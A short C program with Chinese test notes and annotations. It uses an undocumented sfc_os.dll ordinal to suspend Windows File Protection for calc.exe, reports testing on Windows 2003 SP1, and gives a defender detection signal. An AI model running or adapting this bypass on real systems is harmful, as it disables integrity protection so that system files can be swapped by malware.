#include <stdio.h>
#include <windows.h>
// Function-pointer type for the export that Disable_WFP() resolves from
// sfc_os.dll by ordinal (5) and calls as "SetSfcFileException".
// The export is undocumented: the __stdcall convention and the three
// parameter types here are what the call site below assumes, not something
// this page verifies against a header. The call site passes
// (0, <wide path>, -1); the meaning of the first and third arguments is not
// established anywhere on this page — treat them as opaque flags/values.
typedef DWORD(__stdcall *CPP) (DWORD param1, PWCHAR param2, DWORD param3);
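// Calls sfc_os.dll export ordinal 5 (referred to here as SetSfcFileException)
// for one hard-coded system file path.
//
// What the code does: load sfc_os.dll, resolve ordinal 5 as a CPP function
// pointer, and call it with (0, L"c:\\windows\\system32\\calc.exe", -1).
// The note at the end of this page reports that, on Windows 2003 SP1 (CN),
// the file was afterwards not restored by Windows File Protection when
// deleted, and that a reboot may undo the effect (untested there).
//
// Defender notes: the observable pattern is a non-system process loading
// sfc_os.dll and resolving one of its exports by ordinal instead of by name;
// that is a useful detection signal for endpoint telemetry. Windows File
// Protection is the pre-Vista mechanism; later versions use Windows Resource
// Protection (TrustedInstaller-owned ACLs), so this call is not expected to
// apply there — confirm on the target OS version before relying on either
// statement.
//
// Changes over the original: the LoadLibrary and GetProcAddress results were
// never checked, so a missing DLL or export led to a call through a null
// function pointer (a crash rather than a clean no-op).
void Disable_WFP()
{
    // LoadLibraryA is used explicitly because the argument is a narrow
    // literal; LoadLibrary would fail to compile when UNICODE is defined.
    HMODULE hmod = LoadLibraryA("sfc_os.dll");
    if (hmod == NULL) {
        // sfc_os.dll is not present on this system: nothing to do.
        return;
    }
    // The export is referenced by ordinal 5 (see the typedef comment above).
    // MAKEINTRESOURCEA(5) is the documented spelling of an ordinal for
    // GetProcAddress and has the same bit pattern as the original (LPCSTR)5.
    CPP SetSfcFileException = (CPP)GetProcAddress(hmod, MAKEINTRESOURCEA(5));
    if (SetSfcFileException == NULL) {
        // Ordinal 5 is not exported by this build of the DLL; release the
        // handle we took and leave the system untouched.
        FreeLibrary(hmod);
        return;
    }
    SetSfcFileException(0, L"c:\\windows\\system32\\calc.exe", -1);
    // NOTE(review): the original never released hmod after the call, and
    // whether unloading sfc_os.dll affects the exception is not established on
    // this page, so the module is intentionally left loaded to preserve the
    // original behaviour.
}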
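// Program entry point: performs the single sfc_os.dll call in Disable_WFP()
// and exits. Returns 0; the original declared `void main()`, which is not a
// valid signature in standard C or C++ (it is a Visual C++ extension), so the
// portable `int main()` form is used here with no change in behaviour.
int main()
{
    Disable_WFP();
    return 0;
}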
运行后，删除 C:\WINDOWS\SYSTEM32\CALC.EXE 文件，不会自动恢复。
Windows 2K3 CN SP1 VC6 测试通过。
好像说重启后会恢复，这个未测试，所以叫“暂停”。